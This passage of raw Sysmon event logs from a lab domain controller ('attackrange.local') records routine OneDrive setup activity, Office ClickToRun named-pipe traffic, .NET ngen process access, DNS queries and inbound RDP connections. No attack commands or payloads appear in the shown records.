Office\root\integration\Addons\OneDriveSetup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\System32\windows.storage.dll+124156(wow64)|C:\Windows\System32\windows.storage.dll+123e11(wow64)|C:\Windows\System32\windows.storage.dll+123ee3(wow64)|C:\Windows\System32\windows.storage.dll+124bb5(wow64)|C:\Windows\System32\windows.storage.dll+123a61(wow64)|C:\Windows\System32\windows.storage.dll+125db0(wow64)|C:\Windows\System32\windows.storage.dll+12602c(wow64)|C:\Windows\System32\windows.storage.dll+125915(wow64)|C:\Windows\System32\SHELL32.dll+1a8264(wow64)|C:\Windows\System32\SHELL32.dll+1a813e(wow64)|C:\Windows\System32\SHELL32.dll+13be4a(wow64)|C:\Windows\System32\shcore.dll+2fffa(wow64) 154100x800000000000000078302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.792{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe18.151.0729.0013Microsoft OneDrive SetupMicrosoft OneDriveMicrosoft CorporationOneDriveSetup.exe"C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe" C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe /silent /permachine /silent /childprocess /enableOMCTelemetry /cusid:S-1-5-21-325169965-3944942172-2068406585-500 C:\Temp\ATTACKRANGE\Administrator{A7A01FEF-C0A5-607E-58C6-320000000000}0x32c6582HighMD5=11D5E2EF5D9A0E009DF8CC61F4706982,SHA256=17A5F35C30B9D1DBB651686407DBF7D1BDCC685426581AF6796B364550E7FE70,IMPHASH=059AC5CD530DD28EAD72A380619D30D7{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe"C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe" /silent 10341000x800000000000000078301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.779{A7A01FEF-B626-607E-1300-00000000BB01}12644440C:\Windows\System32\svchost.exe{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 354300x800000000000000078299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.328{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-339.attackrange.local49668-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x800000000000000078298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.328{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53036- 354300x800000000000000078297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.243{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55747-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000078296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.161{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-4951-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 18141800x800000000000000078295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.639{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.639{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.639{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.639{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.639{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.639{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.639{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000078264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.295{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\tmp7746.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.295{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=B27857F34BAA8180E5D93FDC036764D9,SHA256=EC90345487D507D6F9E8A13EAF1EAB4A1D5CED3C1565C883043CD4B79DE150F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.295{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D3FF392A9EEB662691F0015E748FB759,SHA256=DB491FAE681298B54DE8EDBCA7A9F0384342872B7933E9106C4AF182099FCE1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.279{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\parentTelemetryCache.otc.session-journalMD5=528AB40C5B578479F2BE0B83716EE4BD,SHA256=639CA3A3B9156684EF63DE836CDA943C0CA53A4F92F63A7A807C3CC6E5CA64C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.279{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\parentTelemetryCache.otc.session-journalMD5=CAE6AF5307323A01A6A6895381CCCEE1,SHA256=D3FBE23390A8846937B2A00A2EE64C32A6C1ED57C39EBF26CA862AE5D81FAA41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.264{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\parentTelemetryCache.otc.session-journalMD5=490BBFAAC0569AC97BBBB1247C14F168,SHA256=ECB450E14E0FEFEA8CF042C093E76DA653D4814D55DC2557B9DAECBE2A767E2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.264{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\parentTelemetryCache.otc.session-journalMD5=1E5A6E334F0CD07AE5E86B0E9951AC0C,SHA256=4D18EF3174CF4869268235A96B51B2EF24612CD43905093B52EED25E6A60141B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.248{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\parentTelemetryCache.otc.session-journalMD5=FA76BA4BCA1B8EB64669B663B8E1799E,SHA256=23F777975BD0195C3F9C880B54DDC2EF479884A0B9387F426C91C0ADDD4A4C8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.248{A7A01FEF-EBFE-607E-1F0E-00000000BB01}3308ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\logs\setup\parentTelemetryCache.otc.session-journalMD5=B3DD6DD3AE2968A2531F161C5680D286,SHA256=67B5F16F5AACB9BA9FB37AC7B728A39BA005D5E38F7536E81B4646B72B899FD8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000078255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.248{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBFF-607E-260E-00000000BB01}4608C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.232{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBFF-607E-260E-00000000BB01}4608C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.232{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EBFF-607E-260E-00000000BB01}4608C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.201{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBFF-607E-250E-00000000BB01}6844C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.201{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBFF-607E-250E-00000000BB01}6844C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.201{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EBFF-607E-250E-00000000BB01}6844C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.107{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.107{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.107{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 